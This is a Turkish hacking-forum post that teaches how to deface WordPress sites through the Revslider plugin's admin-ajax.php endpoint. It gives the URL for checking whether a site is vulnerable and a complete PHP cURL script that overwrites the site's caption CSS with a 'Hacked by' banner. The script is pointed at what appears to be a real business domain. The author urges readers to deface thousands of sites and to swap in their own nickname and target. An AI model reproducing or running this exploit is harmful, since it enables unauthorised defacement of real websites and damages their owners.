Wordpress Hacking [Giriş] Revslider Plug.

Raphers

Adanmış Üye
31 Ağu 2014
7,286
5
System.Net
[FONT=Verdana, Arial, Helvetica, sans-serif]- Bu dökümanda sizlere Wordpress içerik yönetim sistemine bağlı plugins’in yarattığı güvenlik açığından bahsetmek istiyorum.
Bu anlatıcağım güvenlik açığı ile binlerce wordpress tabanlı web sitelerine imzanızı atarak zone kasabilirsiniz.

Öncelikle size güvenlik açığından kısaca bahsetmek istiyorum.
- Revsliderin admin-ajax.php üzerine uzaktan css düzenleme yetkisi vermesi sonucuyla güvenlik açığı ortaya çıkıyor.
- Uzak bir php’den hedef wordpress revslidere verdiğimiz komutu hedef sitemiz kabül etmesiyle site deface ediliyor.
- Anlatımını yapacağım exploit çok güncel ( yaygın ) bir güvenlik açığıdır. 2 3 Ay önce warez olmasına rağmen bu gece yaptığım incelemede 10 dakikada 250 adet açığı olan site bulduğumu farkettim bu nedenle sizlerle paylaşmak istedim. Bizim public ettiğimiz işe yaramaz dediğimiz exploitlerin şimdiki nesillerin vazgeçilmezi olduğunuda bu exploit ile görebiliyorum.

############################################################

# Wordpress Hacking [Giriş] Revslider Plugins #

- Güvenlik açığı hakkında bilgi vermeden mantığı anlatmak istiyorum. Mantık çok basit :


- Açığımızın bulunduğu konum :

/wp-content/plugins/revslider/revslider_admin.php

Exploit:
wordpress/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css


Yukarıda gördüğünüz üzere güvenlik açığı wp-admin klasörünün içinde bulunan admin-ajax.php üzerinden yürütülüyor.

Şimdi bu güvenlik açığı ile siteye nasıl bir zarar verebileceğimize geçelim.

Öncelikle revslider eklentisi bulunan herhangi bir wordpress siteye girelim.

Site sonuna :

wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

Kodunu ekleyip giriş yaptığımızda karşılaştığımız ekran :

dgRrLix.jpg


Bu ise sitede güvenlik açığı bulunduğuna karşılıktır.

Basit gibi görünsede günümüz wordpress sistemlerinde rewslider eklentisi çok fazla yaygın olduğundan dolayı bu exploit ile binlerce zone kasabilirsiniz.
( Kasanlara şahit oluyorum son 1 2 aydır paylaşma imkanı ancak bulabildim )

Yukarıdaki gibi adım adım ilerledik sitede açığı bulduk buradan sonra yapmanız gereken localhost’ta veya herhangi bir host’ta vereceğim php kodlarını çalıştırmak dikkat etmeniz gereken nokta php’ye chmod 777 vermeniz gerekiyor.

- PHP dosyasını hedef siteye göre düzenledikten sonra sitenizden php’ye giriş yapıp hedef siteye erişim sağlamasını sağlayabilirsiniz.

Örneğin :

site.com/a.php gibi düzenleyip a.php’ye site üzerinden girmelisiniz.

Sonrasında wordpress.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

Şeklinde siteye giriş yapıp indexinizi gördüğünüzü fark ediceksiniz.



PHP KODLAR :
Quote:
<?php

$post = array

(

"action" => "revslider_ajax_action",

"client_action" => "update_captions_css",

"data" => "x<bOdy style=’color: transparent;background-color: black’><center><h1><b style=’color: white’>Hacked by KatiLhacker<br><p style=’color: transparent’>"

);

$ch = curl_init ("http://statewidesolutionsnj.com/wp-admin/admin-ajax.php");

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_FOLLOW********, 1);

curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);

curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);

curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);

curl_setopt ($ch, CURLOPT_POST, 1);

curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);

$data = curl_exec ($ch);

curl_close ($ch);

?>

#############################################################


PHP Kodlarda düzenlenmesi gereken yerler :

"data" => "x<bOdy style=’color: transparent;background-color: black’><center><h1><b style=’color: white’>Hacked by KatiLhacker<br><p style=’color: transparent’>"

Kısımındaki katilhacker yazan yere nickinizi.

$ch = curl_init ("http://statewidesolutionsnj.com/wp-admin/admin-ajax.php");

Kısımındaki statewidesolutionsnj.com yazan yerede revslider pluginsi kurulu hedef wordpress sitenizi yazmalısınız.

..

Bu exploit ile binlerce wordpress siteyi hackleyebilirsiniz [/FONT]
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.